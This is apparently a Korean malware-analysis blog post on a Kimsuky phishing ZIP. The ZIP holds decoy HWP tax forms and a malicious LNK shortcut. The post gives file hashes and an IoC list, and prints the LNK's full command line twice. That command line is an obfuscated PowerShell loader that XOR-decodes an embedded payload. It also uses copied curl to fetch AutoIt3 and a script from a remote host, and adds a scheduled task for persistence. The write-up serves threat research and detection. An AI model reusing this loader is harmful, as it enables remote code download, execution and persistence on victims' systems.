북한 김수키(Kimsuky)에서 만든 악성코드-미신고 자금 출처명세서(찾아가는 법 찾기).zip(2025.6.4)
Contents
오늘도 북한 김수키(Kimsuky)에서 만든 악성코드인 미신고 자금 출처명세서(찾아가는 법 찾기).zip(2025.6.4)에 대해 알아보겠습니다. 일단 대충 견적을 보면 이메일로 피해자를 담그려고 한 것 같은 느낌이 듭니다.
파일명: 미신고 자금 출처명세서(찾아가는 법 찾기).zip
사이즈:1 MB
MD5:e2328974ecc81be06619bbd06ebfacb4
SHA-1:f1aa607507e97cf2dee3d3059d3b2b1e73e04087
SHA-256:b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
압축 파일 내용
첨부2.과세표준수정신고서 및 추가자진납부계산서(국세기본법 시행규칙)
첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp
미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk<-이게 핵심해시
파일명:미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk
사이즈:1 MB
MD5:cc72c5bf20e8d5d6efa66dfc1d8efaa4
SHA-1:31bd1480d76972b1727c9ef6953741fd62721fa8
SHA-256:2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
뭐~대충 보면 hwp 가 디코이인 것 같은 것 알 수가 있습니다.
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshel
l(.)exe /s /b /od') do call %a "$managing=0;<#App-Poisoning#>$baker='(l)ength';<#App
-Poisoning#>$dates=Get-Location;$crystal=&(gcm *et-Child*) *.lnk;<#App-Poisoning#>$c
rystal=$crystal|(w)here-object{$_.$baker -eq 0x0000891F};<#App-Poisoning#>$flexiblen
side(r)=$crystal;<#App-Poisoning#>$crystal=$crystal|Select-Object -ExpandProperty Na
me;<#App-Poisoning#>if([string]::IsNullOrEmpty($crystal)){$managing=1;<#App-Poisoni(n)
g#>$dates=$env:USERPROFILE;<#App-Poisoning#>$dates=$dates+'\appdata\local\te(m)p';<#Ap
p-Poisoning#>$crystal=Get-ChildIt(e)m -Path $dates -Recurse -Filter *.lnk|where-object
{$_.$baker -eq 0x0000891(F)}|ForEach-Object{$_.FullName}|Select-Ob(j)ect -First 1;<#Ap
p-Poisoning#>$flexiblensider=$cryst(a)l};<#App-Poisoning#>$toshiba=$crystal.subst(r)in
g(0,$crystal.length-4);$actual=[System.IO.BinaryReader]::new([System.IO.File]::open($c
rystal,[Syst(e)m.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]
::Read));try{$actual.BaseStream.Seek(0x0000182A,[Sy(s)tem.IO.SeekOrigin]::Begin);$appe
al=$actual.ReadBytes(0x00004800);}finally{$actual.Close()};$copper=0;$outlet=0;$gadget
s=$a(p)peal.count;while ($copper -lt $gadgets){$period=0x01;$outlet=$copper-[math(])::
Floor($copper/$period)*$per(i)od;$preview=0x7F+$outlet;$appeal[$copper]=$appeal[$coppe
r] -bxor $preview;$copper++};[Syste(m).IO.File]::WriteAllBytes($toshiba,$appeal);if($m
anaging -eq 1){$blocks=$toshiba}else{$blocks='.\'+$toshiba};& ($)blocks;remove-item -p
ath $flexiblensider -force;"&VGnNWAKjlxZpgiwvLDqrzQYmfRPMbCsJFduekUatX||c()d /d C:\Use
rs\Public\Videos & copy c:\windows\system32\curl(.)exe pJHUsvn.exe & copy c:\windows\s
ystem32\schtasks(.)exe pJHUsvn1.exe & pJHUsvn -k -o AutoIt3(.)exe hxxps://thegreatrati
ngs(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle0 & pJHUsv(n) -k -o CfjiFUW
.cdr hxxps://thegreatratings(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle1
& pJHUsv(n)1 /delete /tn "CfjiFUW" /f & pJHUsvn1 /create /sc mi(n)ute /mo 1 /tn "CfjiF
UW" /tr "C:\Users\Public\Videos\AutoIt3(.)exe C:\Users\Public\Videos\Cfj(i)FUW(.)cdr"
iconlocation: …
파일명: 미신고 자금 출처명세서(찾아가는 법 찾기).zip
사이즈:1 MB
MD5:e2328974ecc81be06619bbd06ebfacb4
SHA-1:f1aa607507e97cf2dee3d3059d3b2b1e73e04087
SHA-256:b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
압축 파일 내용
첨부2.과세표준수정신고서 및 추가자진납부계산서(국세기본법 시행규칙)
첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp
미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk<-이게 핵심해시
파일명:미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk
사이즈:1 MB
MD5:cc72c5bf20e8d5d6efa66dfc1d8efaa4
SHA-1:31bd1480d76972b1727c9ef6953741fd62721fa8
SHA-256:2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
뭐~대충 보면 hwp 가 디코이인 것 같은 것 알 수가 있습니다.
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshel
l(.)exe /s /b /od') do call %a "$managing=0;<#App-Poisoning#>$baker='(l)ength';<#App
-Poisoning#>$dates=Get-Location;$crystal=&(gcm *et-Child*) *.lnk;<#App-Poisoning#>$c
rystal=$crystal|(w)here-object{$_.$baker -eq 0x0000891F};<#App-Poisoning#>$flexiblen
side(r)=$crystal;<#App-Poisoning#>$crystal=$crystal|Select-Object -ExpandProperty Na
me;<#App-Poisoning#>if([string]::IsNullOrEmpty($crystal)){$managing=1;<#App-Poisoni(n)
g#>$dates=$env:USERPROFILE;<#App-Poisoning#>$dates=$dates+'\appdata\local\te(m)p';<#Ap
p-Poisoning#>$crystal=Get-ChildIt(e)m -Path $dates -Recurse -Filter *.lnk|where-object
{$_.$baker -eq 0x0000891(F)}|ForEach-Object{$_.FullName}|Select-Ob(j)ect -First 1;<#Ap
p-Poisoning#>$flexiblensider=$cryst(a)l};<#App-Poisoning#>$toshiba=$crystal.subst(r)in
g(0,$crystal.length-4);$actual=[System.IO.BinaryReader]::new([System.IO.File]::open($c
rystal,[Syst(e)m.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]
::Read));try{$actual.BaseStream.Seek(0x0000182A,[Sy(s)tem.IO.SeekOrigin]::Begin);$appe
al=$actual.ReadBytes(0x00004800);}finally{$actual.Close()};$copper=0;$outlet=0;$gadget
s=$a(p)peal.count;while ($copper -lt $gadgets){$period=0x01;$outlet=$copper-[math(])::
Floor($copper/$period)*$per(i)od;$preview=0x7F+$outlet;$appeal[$copper]=$appeal[$coppe
r] -bxor $preview;$copper++};[Syste(m).IO.File]::WriteAllBytes($toshiba,$appeal);if($m
anaging -eq 1){$blocks=$toshiba}else{$blocks='.\'+$toshiba};& ($)blocks;remove-item -p
ath $flexiblensider -force;"&VGnNWAKjlxZpgiwvLDqrzQYmfRPMbCsJFduekUatX||c()d /d C:\Use
rs\Public\Videos & copy c:\windows\system32\curl(.)exe pJHUsvn.exe & copy c:\windows\s
ystem32\schtasks(.)exe pJHUsvn1.exe & pJHUsvn -k -o AutoIt3(.)exe hxxps://thegreatrati
ngs(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle0 & pJHUsv(n) -k -o CfjiFUW
.cdr hxxps://thegreatratings(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle1
& pJHUsv(n)1 /delete /tn "CfjiFUW" /f & pJHUsvn1 /create /sc mi(n)ute /mo 1 /tn "CfjiF
UW" /tr "C:\Users\Public\Videos\AutoIt3(.)exe C:\Users\Public\Videos\Cfj(i)FUW(.)cdr"
iconlocation: …
IoC
66.96.162.245
31bd1480d76972b1727c9ef6953741fd62721fa8
f1aa607507e97cf2dee3d3059d3b2b1e73e04087
b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
cc72c5bf20e8d5d6efa66dfc1d8efaa4
e2328974ecc81be06619bbd06ebfacb4
31bd1480d76972b1727c9ef6953741fd62721fa8
f1aa607507e97cf2dee3d3059d3b2b1e73e04087
b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
cc72c5bf20e8d5d6efa66dfc1d8efaa4
e2328974ecc81be06619bbd06ebfacb4